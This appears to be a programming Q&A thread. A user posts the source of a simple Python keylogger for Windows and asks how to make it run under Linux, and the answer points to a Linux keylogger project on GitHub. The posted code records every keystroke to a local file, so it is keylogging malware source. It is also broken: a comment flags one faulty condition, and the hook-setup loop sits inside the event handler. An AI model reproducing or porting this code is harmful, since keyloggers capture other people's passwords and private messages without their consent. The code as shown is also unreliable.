# How to modify this python keylogger code for windows to be used under linux?

Tags: python, windows, winapi, porting, keylogger

There is this basic [keylogger](http://antihackingtutorials.blogspot.co.uk/2012/06/in-this-tutorial-we-will-show-you-how.html) code in python to run under windows. How can it be modified to run under Linux?

```
import win32api 
import sys
import pythoncom, pyHook 
buffer = ''
def OnKeyboardEvent(event):
    if event.Ascii == 5: 
        sys.exit() 
    if event.Ascii != 0 or 8: 
        f = open ('c:\\outputKeyLogger.txt', 'a') 
    keylogs = chr(event.Ascii) 
    if event.Ascii == 13: 
        keylogs = keylogs + '\n' 
    f.write(keylogs) 
    f.close() 
    while True:
        hm = pyHook.HookManager() 
        hm.KeyDown = OnKeyboardEvent 
        hm.HookKeyboard() 
        pythoncom.PumpMessages()
```

Comment: correct me if i'm wrong, but doesn't the line if event.Ascii != 0 or 8 mean "if event.Ascii does not equal 0, or if 8 is True"? So if event.Ascii doesn't equal 0, this condition will always return True(because 8 is True). That's probably not what you want here, it should be, if event.Ascii != 0 or event.Ascii != 8. Or more concise ex: if event.Ascii not in [0, 8]

Comment: @Totem, yes, that passed me by. Good observation. Changing it, but still it won't run under linux

Answer (score 1):

Below is a link to the source for a keylogger for linux on Github by [amoffat](https://github.com/amoffat). It makes use of the `ctypes` Python module, a foreign function library for Python, which provides C compatible datatypes and allows calling functions in DLLs. This appears to be used to access the X windows environment on linux to capture the keys pressed for logging. Click into the `pykeylogger.py` file to see the full source. Hope this helps.

https://github.com/amoffat/pykeylogger

Info on `ctypes` -

https://docs.python.org/2/library/ctypes.html